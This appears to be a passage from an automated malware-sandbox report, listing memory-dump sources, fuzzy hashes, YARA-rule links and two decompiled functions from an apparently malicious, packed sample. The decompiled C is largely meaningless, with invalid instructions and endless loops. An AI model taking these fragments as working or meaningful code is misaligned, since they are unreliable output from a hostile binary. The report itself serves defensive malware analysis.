0x00404426
0x00404427
0x0040442a
0x0040442b
0x0040442e
0x0040442f
0x00404432
0x00404437
0x0040443a
0x0040443b
0x0040443e
0x00404443
0x00404445
0x00404448
0x0040444a
0x0040444b
0x0040444f
0x00404451
0x00404453
0x00404455
0x00404456
0x00404459
0x0040445a
0x0040445b
0x0040445d
0x0040445e
0x0040445f
0x00404461
0x00404462
0x00404463
0x00404464
0x00404465
0x00404466
0x00404467
0x00404468
0x0040446a
0x0040446c
0x0040446d
0x00404471
0x00404478
0x0040447b
0x00404481
0x00404487
0x0040448d
0x0040448d
0x0040448d
0x0040448d
0x00404493
0x00404497
0x0040449a
0x0040449b
0x0040449e
0x0040449f
0x004044a3
0x004044a7
0x004044aa
0x004044ab
0x004044ae
0x004044af
0x004044b1
0x004044b3
0x004044b5
0x004044ca
0x004044cb
0x004044ce
0x004044cf
0x004044d7
0x004044de
0x004044df
0x004044e5
0x004044e7
0x004044ea
0x004044eb
0x004044ef
0x004044f3
0x004044f5
0x004044f8
0x004044fa
0x004044fb
0x004044fd
0x00404501
0x00404502
0x00404503
0x00404505
0x00404506
0x00404507
0x00404509
0x00404509
0x0040450c
0x0040457e
0x00404582
0x00404584
0x00404587
0x0040458a
0x0040458e
0x0040458f
0x00404593
0x00404599
0x0040459b
0x004045a1
0x004045a2
0x004045a3
0x004045a9
0x004045ab
0x004045af
0x004045b1
0x00404632
0x00404633
0x00404639
0x0040463a
0x0040463e
0x00404647
0x0040464b
0x0040464e
0x0040464f
0x00404652
0x00404653
0x00404657
0x0040465a
0x0040465b
0x00404661
0x00404663
0x004046ad
0x004046ad
0x004046ae
0x004046af
0x004046a5
0x004046a6
0x004046a7
0x004046a8
0x004046aa
0x004046ac
0x004046ac
0x004046ad
0x004045b3
0x004045b7
0x004045bf
0x004045c6
0x004045c7
0x004045c9
0x004045cb
0x004045cf
0x004045d1
0x004045d5
0x004045d6
0x004045d7
0x004045d9
0x004045da
0x004045db
0x004045dd
0x004045de
0x004045df
0x004045e1
0x004045e2
0x004045e3
0x004045e4
0x004045e5
0x004045e5
0x004045e6
0x004045e7
0x004045e8
0x004045ea
0x004045ec
0x004045ed
0x004045ee
0x004045ef
0x00000000
0x004045ef
0x0040450f
0x00404511
0x00404513
0x00404515
0x00404516
0x00404517
0x00404519
0x0040451a
0x0040451b
0x0040451d
0x0040451e
0x0040451f
0x00404521
0x00404522
0x00404523
0x00404524
0x00404525
0x00404525
0x00404526
0x00404527
0x00404528
0x0040452a
0x0040452c
0x0040452d
0x0040452e
0x0040452f
0x00000000
0x0040452f
0x004044b7
0x004044b9
0x004044bb
0x004044be
0x004044c0
0x004044c2
0x004044c2
0x004044c6
0x00000000

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb7b6897244144aff69002ab45a0ea7b779438a3f08da38c9fb079f5040dc58
Instruction ID: 20ba99a5fdbafcb62747c3c0ac12857291a6189e0b89fc51e86d7affe50c3ad5
Opcode Fuzzy Hash: 9eb7b6897244144aff69002ab45a0ea7b779438a3f08da38c9fb079f5040dc58
Instruction Fuzzy Hash: D6011435909269DB974E9E30880356BBF79FB42B007A5A1AEE443CA872C7714C51EBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00403488, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd11c7806e473280b2e1364934d2a2a555de9e4f82fa697673b409e972ad3f30
Instruction ID: e09b04d84017201cf6c13bf51e59447eb05d7ea3989e20c2e4fac1b98139d0dd
Opcode Fuzzy Hash: cd11c7806e473280b2e1364934d2a2a555de9e4f82fa697673b409e972ad3f30
Instruction Fuzzy Hash: 2CF03731C01624CFC72ECE388403546BFB5FF0AB08B61A6AED453DBAB4DA351952CB84

Uniqueness

Uniqueness Score: -1.00%

Function 020F78E2, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca26edffe930dc24ed32630ce92a6cd263fc4c7ef7f3e2df176ac6ab2e2de9b3
Instruction ID: 0903f6f3e40e7f0a6943c13b6d9d4a6b01af2459b18177296ffe39504ca1caa5
Opcode Fuzzy Hash: ca26edffe930dc24ed32630ce92a6cd263fc4c7ef7f3e2df176ac6ab2e2de9b3
Instruction Fuzzy Hash: 91019E7A245744CFCB65CF14DC84AEAB3E2BFE8360F16402AD9058BB70D3309A00EA01

Uniqueness

Uniqueness Score: -1.00%

Function 020F77FF, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a48377fcf880c8ce04b48c8cce440495a3b4493b9ed801bf94a0c6e4b0524f9e
Instruction ID: ba81347e200788da5de0ff35415a14627f6c56e7ded8138f3878fb661c140496
Opcode Fuzzy Hash: a48377fcf880c8ce04b48c8cce440495a3b4493b9ed801bf94a0c6e4b0524f9e
Instruction Fuzzy Hash: 5F018F3554834D8EDFB09F74C8956EB7372EF2A744F960055CE4E4BA21D3700682C716

Uniqueness

Uniqueness Score: -1.00%

Function 004043B8, Relevance: .0, Instructions: 34
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E004043B8() {
				signed int _t144;
				signed int _t147;
				signed char _t148;
				signed int _t149;
				signed int _t152;
				signed int _t153;
				signed char _t157;
				signed int _t158;
				signed int _t159;
				void* _t160;
				signed char _t162;
				signed char _t163;
				signed int _t164;
				void* _t168;
				signed int _t169;
				signed int _t170;
				signed int* _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed char _t177;
				signed int _t178;
				signed int _t179;
				void* _t180;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				void* _t187;
				signed int _t188;
				signed int _t191;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				signed int _t203;
				void* _t205;
				void* _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;

				_t158 = _t157 & 0x00000084;
				 *(_t187 - 0x63ce7d20) =  *(_t187 - 0x63ce7d20) ^ _t158;
				 *((char*)(_t144 - 0x600365cf)) =  *((char*)(_t144 - 0x600365cf)) + 1;
				 *(_t144 + _t182 * 8 - 0x46cce67) =  *(_t144 + _t182 * 8 - 0x46cce67) ^ _t174;
				_t183 = _t144;
				 *(_t183 - 0xcce7a07) =  *(_t183 - 0xcce7a07) ^ _t158;
				asm("sti");
				asm("stc");
				asm("cli");
				asm("sti");
				_t159 = _t158 ^ _t183;
				asm("cld");
				asm("loope 0x33");
				asm("invalid");
				_t175 = _t182 %  *_t162;
				asm("popfd");
				_t147 =  *((intOrPtr*)(_t162 + _t187 + 0x31a383b8));
				asm("cdq");
				_t188 = _t187;
				 *_t188 =  *_t188 ^ _t175;
				_pop(_t202);
				 *_t162 =  *_t162 + _t188;
				 *_t175 =  *_t175 & _t162;
				 *[cs:ebx+esi*2] =  *[cs:ebx+esi*2] ^ _t207;
				asm("adc [ecx], esi");
				asm("adc ebx, [edi+0x19]");
				 *(_t175 - 0x59) =  *(_t175 - 0x59) ^ _t183;
				 *(_t162 - 0x64) =  *(_t162 - 0x64) ^ _t159;
				_pop(_t163);
				 *(_t147 + 0x41 + _t188 * 8) =  *(_t147 + 0x41 + _t188 * 8) ^ _t163;
				 *(_t159 - 0x5cceb802) =  *(_t159 - 0x5cceb802) ^ _t183;
				asm("in eax, 0x40");
				 *(_t183 - 4) =  *(_t183 - 4) ^ _t163;
				_pop(_t176);
				 *(_t202 - 0xb) =  *(_t202 - 0xb) ^ _t147;
				_push(_t202);
				 *(_t176 - 0x73) =  *(_t176 - 0x73) ^ _t159;
				_push(_t147);
				 *(_t202 - 0x79) =  *(_t202 - 0x79) ^ _t176;
				asm("insd");
				 *(_t183 - 0x7f) =  *(_t183 - 0x7f) ^ _t202;
				_push(0x7f760b31);
				 *(_t147 + 0x60) =  *(_t147 + 0x60) ^ _t207;
				_t208 = _t207 - 1;
				 *(_t159 + 0x68) =  *(_t159 + 0x68) ^ _t202;
				_t148 =  *0x4a090831;
				 *_t148 =  *_t148 ^ _t163;
				 *(_t176 + 0x31) =  *(_t176 + 0x31) | _t163;
				_t164 = _t163 |  *_t159;
				_t203 = _t202 - 1;
				 *(_t176 + 0x73) =  *(_t176 + 0x73) ^ 0xb63147ea;
				 *_t164 =  *_t164 ^ 0xb63147ea;
				 *_t164 =  *_t164 ^ 0xb63147ea;
				_t191 = 0xffffffffb63147eb ^ _t164;
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				asm("jecxz 0xffffffd0");
				asm("into");
				asm("into");
				asm("fcmovne st0, st6");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				 *0xb63147ea =  *0xb63147ea ^ 0xb63147ea;
				 *0xb63147ea =  *0xb63147ea ^ 0xb63147ea;
				asm("stc");
				_t177 = _t176 >> 1;
				do {
					_t149 = _t148 & 0x00000085;
					 *(_t191 - 0x63ce7c1f) =  *(_t191 - 0x63ce7c1f) ^ _t159;
					 *0xFFFFFFFF9FFA9B31 =  *((char*)(0xffffffff9ffa9b31)) + 1;
					 *(_t177 - 0x4dce6e0e) =  *(_t177 - 0x4dce6e0e) ^ _t203;
					_t56 = _t149 - 0x4d7ab2cf;
					_t57 = _t159;
					_t159 =  *_t56;
					 *_t56 = _t57;
					 *(_t149 - 0x7d) =  *(_t149 - 0x7d) ^ 0;
					 *(_t203 - 0x62) =  *(_t203 - 0x62) ^ _t149;
					_t178 = _t177 - 1;
					 *0xFFFFFFFFFFFFFF9C =  *0xFFFFFFFFFFFFFF9C ^ _t149;
					_t193 = _t191 - 1 + 1;
					 *(_t203 - 0x66) =  *(_t203 - 0x66) ^ _t159;
					 *0xFFFFFFFFFFFFFF99 =  *0xFFFFFFFFFFFFFF99 ^ _t159;
					 *(_t203 + 1 - 0x69) =  *(_t203 + 1 - 0x69) ^ _t178;
					_pop(_t205);
					 *0xFFFFFFFFFFFFFF96 =  *0xFFFFFFFFFFFFFF96 ^ _t178;
					_pop(0);
					 *0x00000000 =  *0x00000000 ^ _t149;
					_t177 = 0x71;
					 *_t193 =  *_t193 ^ _t208;
					if( *_t193 >= 0) {
						L6:
						 *(_t149 - 0xf) =  *(_t149 - 0xf) ^ 0;
						_t206 = _t208;
						 *(_t183 + _t183 * 8 - 0x1741cebe) =  *(_t183 + _t183 * 8 - 0x1741cebe) ^ _t193;
						 *(0 + _t177 * 8 - 0x125fceb8) =  *(0 + _t177 * 8 - 0x125fceb8) ^ _t208;
						_t185 = _t183 + 2;
						 *0xFFFFFFFFB13140E6 =  *0xFFFFFFFFB13140E6 ^ _t185;
						asm("loope 0x5f");
						 *(_t149 - 8) =  *(_t149 - 8) ^ 0;
						_pop(_t168);
						 *(_t159 - 0xe) =  *(_t159 - 0xe) ^ _t149;
						 *(_t149 + 0x63 + _t185 * 4) =  *(_t149 + 0x63 + _t185 * 4) ^ _t185;
						 *_t149 =  *_t149 ^ _t159;
						asm("sbb [eax+0x31], esp");
						_t160 = _t159 + 1;
						_t169 = _t149 + 1;
						 *_t177 =  *_t177 ^ _t169;
						_t170 = _t169 |  *(_t206 + 0x31);
						es = es;
						_t152 = _t168 - 1;
						 *_t193 =  *_t193 ^ _t152;
						es = _t177;
						_t153 = _t152 - 1;
						 *_t153 =  *_t153 ^ _t170;
						_t106 = _t160 + 0x31;
						 *_t106 =  *(_t160 + 0x31) | _t170;
						if( *_t106 >= 0) {
							 *[es:edx] =  *[es:edx] ^ _t208;
							_t194 = _t193 -  *_t170;
							asm("adc [edi+0x7], ecx");
							 *(_t206 - 0x58) =  *(_t206 - 0x58) ^ _t185;
							 *[gs:ebp-0x63] =  *[gs:ebp-0x63] ^ _t177;
							_push(_t170);
							 *(_t185 + 0x59 + _t170 * 4) =  *(_t185 + 0x59 + _t170 * 4) ^ _t153;
							 *(_t160 - 0x45cea106) =  *(_t160 - 0x45cea106) ^ _t194;
							asm("out 0x42, eax");
							 *(_t177 - 0x5fcebb12) =  *(_t177 - 0x5fcebb12) ^ _t208;
							asm("out dx, eax");
							_t209 = _t208 + 1;
							 *(_t177 - 0x4bcebf17) =  *(_t177 - 0x4bcebf17) ^ _t185;
							asm("loop 0x5e");
							 *(_t185 - 4) =  *(_t185 - 4) ^ _t170;
							 *_t153 =  *_t153 ^ _t170;
							if( *_t153 >= 0) {
								_push(_t153);
								 *0x23311f47 =  *0x23311f47 ^ _t177;
								_push(cs);
								_t195 = _t194 -  *_t170;
								_t179 = _t177 &  *_t170;
								 *_t195 =  *_t195 ^ _t179;
								 *(_t179 - 0x55) =  *(_t179 - 0x55) ^ _t185;
								asm("pushad");
								 *0xFFFFFFFFFFFFFFA5 =  *0xFFFFFFFFFFFFFFA5 ^ _t179;
								asm("outsb");
								 *(_t179 - 0x74) =  *(_t179 - 0x74) ^ 0x00000008;
								 *(_t185 - 5) =  *(_t185 - 5) ^ _t170;
								_t180 = _t209;
								 *(_t195 - 0x5ecea11e) =  *(_t195 - 0x5ecea11e) ^ _t195;
								asm("in al, dx");
								 *(_t180 + 1 - 0x40cebb12) =  *(_t180 + 1 - 0x40cebb12) ^ _t209;
								while(1) {
									asm("out dx, al");
									asm("sti");
									_t170 = _t170 ^ _t195;
									asm("into");
									asm("into");
									asm("into");
									 *_t170 =  *_t170 ^ _t195;
									 *_t170 =  *_t170 ^ _t195;
									asm("stc");
								}
							}
							 *(_t177 + 0x63) =  *(_t177 + 0x63) ^ _t209;
							 *(_t194 - 1 + 0x67) =  *(_t194 - 1 + 0x67) ^ _t209;
							 *(_t153 + 0x5043149) =  *(_t153 + 0x5043149) ^ _t153;
							_t171 = _t170 - 1;
							 *0x49050431 =  *0x49050431 ^ _t153;
							_pop(es);
							 *(_t153 - 1 + 0x71) =  *(_t153 - 1 + 0x71) ^ 0x49050431;
							 *_t171 =  *_t171 ^ 0x49050431;
							 *_t171 =  *_t171 ^ 0x49050431;
							asm("into");
							asm("into");
							_t172 = 0x49050431;
							asm("into");
							asm("into");
							asm("jecxz 0xffffffd0");
							asm("into");
							asm("into");
							asm("fcmovne st0, st6");
							asm("into");
							asm("into");
							asm("into");
							asm("into");
							L11:
							asm("into");
							asm("into");
							asm("into");
							 *_t172 =  *_t172 ^ 0x49050431;
							 *_t172 =  *_t172 ^ 0x49050431;
							asm("stc");
							asm("out dx, al");
							asm("cli");
							_t172 = _t172 ^ 0x49050431;
							goto L11;
						}
						 *_t170 =  *_t170 ^ _t193;
						 *_t170 =  *_t170 ^ _t193;
						_t199 = _t193 ^ _t170;
						asm("into");
						asm("into");
						_t173 = _t199;
						asm("into");
						asm("into");
						asm("jecxz 0xffffffd0");
						asm("into");
						asm("into");
						asm("fcmovne st0, st6");
						asm("into");
						asm("into");
						asm("into");
						asm("into");
						L8:
						asm("into");
						asm("into");
						asm("into");
						 *_t173 =  *_t173 ^ _t199;
						 *_t173 =  *_t173 ^ _t199;
						asm("stc");
						asm("out dx, al");
						asm("cli");
						_t173 = _t173 ^ _t199;
						goto L8;
					}
					 *_t183 =  *_t183 ^ _t183;
					_t203 = _t205 +  *_t159;
					 *(_t149 + _t183 * 2) =  *(_t149 + _t183 * 2) ^ _t208;
					_t148 = _t149 - 0x31;
					_t191 = _t193 + 1;
					 *0x00000000 =  *0x00000000 + _t191;
				} while ( *0x00000000 > 0);
				 *(_t191 - 0x64) =  *(_t191 - 0x64) ^ 0x00000071;
				goto L6;
			}

0x004043b8
0x004043bb
0x004043c1
0x004043c7
0x004043ce
0x004043cf
0x004043d5
0x004043d6
0x004043d9
0x004043da
0x004043db
0x004043dd
0x004043de
0x004043e0
0x004043e2
0x004043e4
0x004043e5
0x004043ed
0x004043ee
0x004043ef
0x004043f1
0x004043f2
0x004043f4
0x004043f6
0x004043fa
0x004043fc
0x004043ff
0x00404402
0x00404406
0x00404407
0x0040440b
0x0040441d
0x0040441f
0x00404422
0x00404423
0x00404426
0x00404427
0x0040442a
0x0040442b
0x0040442e
0x0040442f
0x00404432
0x00404437
0x0040443a
0x0040443b
0x0040443e
0x00404443
0x00404445
0x00404448
0x0040444a
0x0040444b
0x0040444f
0x00404451
0x00404453
0x00404455
0x00404456
0x00404459
0x0040445a
0x0040445b
0x0040445d
0x0040445e
0x0040445f
0x00404461
0x00404462
0x00404463
0x00404464
0x00404465
0x00404466
0x00404467
0x00404468
0x0040446a
0x0040446c
0x0040446d
0x00404471
0x00404478
0x0040447b
0x00404481
0x00404487
0x0040448d
0x0040448d
0x0040448d
0x0040448d
0x00404493
0x00404497
0x0040449a
0x0040449b
0x0040449e
0x0040449f
0x004044a3
0x004044a7
0x004044aa
0x004044ab
0x004044ae
0x004044af
0x004044b1
0x004044b3
0x004044b5
0x004044ca
0x004044cb
0x004044ce
0x004044cf
0x004044d7
0x004044de
0x004044df
0x004044e5
0x004044e7
0x004044ea
0x004044eb
0x004044ef
0x004044f3
0x004044f5
0x004044f8
0x004044fa
0x004044fb
0x004044fd
0x00404501
0x00404502
0x00404503
0x00404505
0x00404506
0x00404507
0x00404509
0x00404509
0x0040450c
0x0040457e
0x00404582
0x00404584
0x00404587
0x0040458a
0x0040458e
0x0040458f
0x00404593
0x00404599
0x0040459b
0x004045a1
0x004045a2
0x004045a3
0x004045a9
0x004045ab
0x004045af
0x004045b1
0x00404632
0x00404633
0x00404639
0x0040463a
0x0040463e
0x00404647
0x0040464b
0x0040464e
0x0040464f
0x00404652
0x00404653
0x00404657
0x0040465a
0x0040465b
0x00404661
0x00404663
0x004046ad
0x004046ad
0x004046ae
0x004046af
0x004046a5
0x004046a6
0x004046a7
0x004046a8
0x004046aa
0x004046ac
0x004046ac
0x004046ad
0x004045b3
0x004045b7
0x004045bf
0x004045c6
0x004045c7
0x004045c9
0x004045cb
0x004045cf
0x004045d1
0x004045d5
0x004045d6
0x004045d7
0x004045d9
0x004045da
0x004045db
0x004045dd
0x004045de
0x004045df
0x004045e1
0x004045e2
0x004045e3
0x004045e4
0x004045e5
0x004045e5
0x004045e6
0x004045e7
0x004045e8
0x004045ea
0x004045ec
0x004045ed
0x004045ee
0x004045ef
0x00000000
0x004045ef
0x0040450f
0x00404511
0x00404513
0x00404515
0x00404516
0x00404517
0x00404519
0x0040451a
0x0040451b
0x0040451d
0x0040451e
0x0040451f
0x00404521
0x00404522
0x00404523
0x00404524
0x00404525
0x00404525
0x00404526
0x00404527
0x00404528
0x0040452a
0x0040452c
0x0040452d
0x0040452e
0x0040452f
0x00000000
0x0040452f
0x004044b7
0x004044b9
0x004044bb
0x004044be
0x004044c0
0x004044c2
0x004044c2
0x004044c6
0x00000000

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05514a68aad8e87db288e7a52d1de5969151983ecbd06ed3abdb85b23ba438b7
Instruction ID: dea5de2ffa6901299b53b1d380770115796fa35f42719ab0690045e455ef80aa
Opcode Fuzzy Hash: 05514a68aad8e87db288e7a52d1de5969151983ecbd06ed3abdb85b23ba438b7
Instruction Fuzzy Hash: 85F0C232408766CFC35FCF71C455563BF72BE8671871405AED082CE1A2D7725106CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00401A45, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00401A45(signed int* __eax, signed int __ebx, intOrPtr* __ecx, void* __edx, signed int __edi, signed int __esi) {
				void* _t15;
				void* _t16;
				signed int _t20;
				signed int _t22;
				signed int _t29;
				signed int _t31;
				void* _t43;
				signed int _t48;
				signed int _t50;
				signed int _t59;
				signed int _t60;
				signed int _t71;
				void* _t72;

				L0:
				while(1) {
					L0:
					_t55 = __esi;
					_t48 = __edi;
					_push(ss);
					asm("sbb [eax], bl");
					asm("sbb [eax], bl");
					_push(ss);
					asm("sbb [ebp+0x65f5cb], bh");
					asm("adc [eax], al");
					asm("adc [esi], ch");
					 *__eax = __eax +  *__eax;
					 *__eax = __eax +  *__eax;
					 *__eax = __eax +  *__eax;
					 *__ecx =  *__ecx + __eax;
					asm("cpuid");
					_t29 = 0x0000000e ^ __esi;
					asm("into");
					asm("into");
					asm("into");
					asm("into");
					asm("sbb [eax+ebx], dl");
					asm("lfs edx, [ebx+0x71babca0]");
					_t22 = __ebx |  *__eax;
					_push(ss);
					_push(ss);
					asm("sbb cl, bh");
					asm("retf");
					asm("cmpsb");
					if(_t22 < 0) {
						break;
					}
					L2:
					asm("adc [eax], dl");
					 *__edi =  *__edi + _t29;
					asm("adc [eax], dl");
					 *[cs:eax] =  *[cs:eax] + __eax;
					_push(ds);
					if( *[cs:eax] >= 0) {
						L1:
						_t29 = _t29 ^ __esi;
						asm("into");
						asm("into");
						asm("into");
						asm("into");
						_t22 = _t22 ^  *(_t29 - 0x58);
						asm("retf");
						 *__esi = ss;
						continue;
					} else {
						L3:
						_t43 = 0xb1;
						asm("into");
						asm("into");
						asm("into");
						asm("into");
						_t60 = _t59 ^  *(__eax - 0x5b391358);
						_push(ss);
						asm("sbb [eax+ebx], dl");
						_t31 = (_t29 ^ __esi) +  *__esi;
						_push(cs);
						asm("sbb [eax], bl");
						_push(ss);
						_push(ss);
						asm("sbb [esi], ecx");
						_t15 = 0x5c;
						_t71 =  *(__esi + 0x64) * 0x65;
						if(_t71 >= 0) {
							L20:
							if(__eflags > 0) {
								L21:
								asm("adc al, 0x14");
								goto L22;
							}
							goto L23;
						} else {
							L4:
							if(_t71 == 0) {
								L5:
								asm("adc [eax], al");
								asm("adc [eax], dl");
								asm("adc [ecx], al");
								L6:
								_t22 = 0xb6;
								_t43 = 0xb0;
								_t31 = _t31 ^ __esi;
								asm("into");
								asm("into");
								asm("into");
								asm("into");
							}
							L7:
							asm("repne in eax, dx");
							asm("retf");
							asm("invalid");
							asm("adc al, 0x14");
							asm("adc al, 0x14");
							asm("sbb [esi], dl");
							asm("sbb [esi], dl");
							asm("sbb [eax+ebx], dl");
							asm("adc al, 0xd8");
							asm("invalid");
							_t72 = _t43;
							_t55 = ss;
							asm("insd");
							_push(_t31);
							if(_t72 > 0) {
								L30:
								asm("adc al, 0x16");
								goto L31;
							} else {
								L8:
								if(_t72 >= 0) {
									L28:
									_t15 = 0x1614161d;
									L29:
									asm("sbb eax, 0x71161416");
									goto L30;
								} else {
									L9:
									if(_t72 >= 0) {
										goto L30;
									} else {
										L10:
										if(_t72 != 0) {
											L31:
											_push(ss);
											if(__eflags >= 0) {
												goto L13;
											}
											L32:
											asm("invalid");
											L33:
											asm("std");
											asm("out 0xfe, eax");
											_t15 = _t15 - 1;
											__eflags = _t55 + 1;
											_push(0x6b);
											_push(0x1f7f7f64);
										} else {
											L11:
											if(_t72 >= 0) {
												L12:
												L13:
												asm("into");
												asm("into");
												asm("into");
												asm("into");
												asm("into");
												asm("out dx, al");
												asm("out dx, al");
												asm("invalid");
												return _t15;
											}
											L15:
											asm("adc al, 0x14");
											asm("adc al, 0x14");
											asm("adc al, 0x14");
											asm("adc al, 0x8c");
											asm("invalid");
											asm("out 0xfe, al");
											_t55 = _t55 + 1;
											__eflags = _t55;
											_pop(_t48);
											_push(0x68);
											if(__eflags > 0) {
												L36:
												asm("retf");
												asm("out 0x4d, eax");
												__eflags = _t48 - 1 + 1;
												asm("insb");
												_push(0x6b);
												_push(0x4ea01765);
												L37:
												asm("into");
												asm("into");
												asm("into");
												asm("into");
												asm("invalid");
												asm("out dx, eax");
												asm("out dx, eax");
												asm("out dx, eax");
												asm("out dx, eax");
												goto L37;
											}
											L16:
											if(__eflags >= 0) {
												L35:
												asm("invalid");
												goto L36;
											}
											L17:
											if(__eflags < 0) {
												L18:
												if(__eflags != 0) {
													L22:
													asm("adc al, 0x14");
													asm("adc al, 0x14");
													asm("adc al, 0x2");
													asm("stc");
													_t43 = 0x98;
													asm("invalid");
													 *((char*)(_t60 + 0x48)) =  *((char*)(_t60 + 0x48)) - 1;
													_t48 = _t48 + 1;
													asm("insb");
													_t60 =  *(_t15 + 0x64) * 0x7f;
													__eflags = _t60;
												} else {
													L19:
													asm("into");
													asm("into");
													asm("into");
													asm("into");
													asm("into");
													_t20 =  *0x33b04eb1 ^ _t60;
													__eflags = _t20;
													asm("invalid");
													asm("out dx, al");
													asm("invalid");
													return _t20;
												}
												L23:
												if(__eflags > 0) {
													L38:
													__eflags = _t31 + 1;
													L39:
													_t16 = _t15 - 0x3d;
													__eflags = _t16 - 0x495c662c;
													_t50 = _t48;
													__eflags = _t50;
													L40:
													_t60 = _t60 - 1;
													_t16 = _t16 - 1;
													_t50 = _t50 + 2;
													asm("insb");
													_t22 = 0x1a;
													asm("sbb cl, [esi+0x1c]");
													asm("into");
													asm("into");
													asm("into");
													asm("into");
													asm("invalid");
													asm("out dx, eax");
													asm("out dx, eax");
													asm("out dx, eax");
													goto L40;
												}
												L24:
												if (__eflags > 0) goto L38;
												L25:
												if(__eflags >= 0) {
													goto L38;
												}
												L26:
												_push(ds);
												L27:
												asm("into");
												asm("into");
												asm("into");
												asm("into");
												asm("into");
												asm("invalid");
												asm("out dx, eax");
												asm("out dx, eax");
												asm("rol dh, 0xc6");
												asm("sti");
												goto L28;
											}
										}
									}
								}
							}
						}
						L34:
						asm("rdpmc");
						asm("into");
						asm("into");
						asm("into");
						asm("into");
						asm("into");
						__eflags = 0;
						asm("invalid");
						asm("out dx, eax");
						asm("out dx, eax");
						asm("out dx, eax");
						asm("out dx, eax");
						return _t15;
					}
					L41:
				}
				L14:
				return __eax;
				goto L41;
			}

0x00401a45
0x00401a45
0x00401a45
0x00401a45
0x00401a45
0x00401a45
0x00401a46
0x00401a51
0x00401a53
0x00401a54
0x00401a5a
0x00401a5c
0x00401a5e
0x00401a60
0x00401a62
0x00401a64
0x00401a66
0x00401a6a
0x00401a6c
0x00401a6d
0x00401a6e
0x00401a6f
0x00401a76
0x00401a79
0x00401a80
0x00401a82
0x00401a83
0x00401a84
0x00401a86
0x00401a87
0x00401a88
0x00000000
0x00000000
0x00401a8c
0x00401a8c
0x00401a8e
0x00401a90
0x00401a92
0x00401a95
0x00401a96
0x00401a38
0x00401a3a
0x00401a3c
0x00401a3d
0x00401a3e
0x00401a3f
0x00401a40
0x00401a43
0x00401a44
0x00000000
0x00401a98
0x00401a98
0x00401a98
0x00401a9c
0x00401a9d
0x00401a9e
0x00401a9f
0x00401aa0
0x00401aa6
0x00401aa7
0x00401aaa
0x00401aae
0x00401aaf
0x00401ab1
0x00401ab2
0x00401ab3
0x00401ab5
0x00401ab8
0x00401abc
0x00401b38
0x00401b38
0x00401b3a
0x00401b3a
0x00000000
0x00401b3a
0x00000000
0x00401abe
0x00401abe
0x00401abe
0x00401ac0
0x00401ac0
0x00401ac2
0x00401ac4
0x00401ac6
0x00401ac6
0x00401ac8
0x00401aca
0x00401acc
0x00401acd
0x00401ace
0x00401acf
0x00401acf
0x00401ad0
0x00401ad2
0x00401ad4
0x00401ad5
0x00401ad7
0x00401ad9
0x00401adb
0x00401add
0x00401ae0
0x00401ae3
0x00401ae5
0x00401ae7
0x00401ae8
0x00401ae9
0x00401aea
0x00401aeb
0x00401b6d
0x00401b6d
0x00000000
0x00401aee
0x00401aee
0x00401aee
0x00401b6a
0x00401b6a
0x00401b6b
0x00401b6b
0x00000000
0x00401af0
0x00401af0
0x00401af0
0x00000000
0x00401af2
0x00401af2
0x00401af2
0x00401b6e
0x00401b6e
0x00401b6f
0x00000000
0x00000000
0x00401b71
0x00401b71
0x00401b73
0x00401b77
0x00401b78
0x00401b7b
0x00401b7c
0x00401b7e
0x00401b80
0x00401af4
0x00401af4
0x00401af4
0x00401af6
0x00401afb
0x00401afb
0x00401afc
0x00401afd
0x00401afe
0x00401aff
0x00401b02
0x00401b03
0x00401b04
0x00000000
0x00401b04
0x00401b0c
0x00401b0c
0x00401b0e
0x00401b10
0x00401b12
0x00401b14
0x00401b16
0x00401b19
0x00401b19
0x00401b1a
0x00401b1b
0x00401b1d
0x00401b9f
0x00401b9f
0x00401baa
0x00401bae
0x00401baf
0x00401bb0
0x00401bb2
0x00401bb5
0x00401bbc
0x00401bbd
0x00401bbe
0x00401bbf
0x00401bc2
0x00401bc4
0x00401bc5
0x00401bc6
0x00401bc7
0x00000000
0x00401bc7
0x00401b20
0x00401b20
0x00401b9e
0x00401b9e
0x00000000
0x00401b9e
0x00401b22
0x00401b22
0x00401b24
0x00401b24
0x00401b3c
0x00401b3c
0x00401b3e
0x00401b40
0x00401b42
0x00401b43
0x00401b46
0x00401b48
0x00401b4b
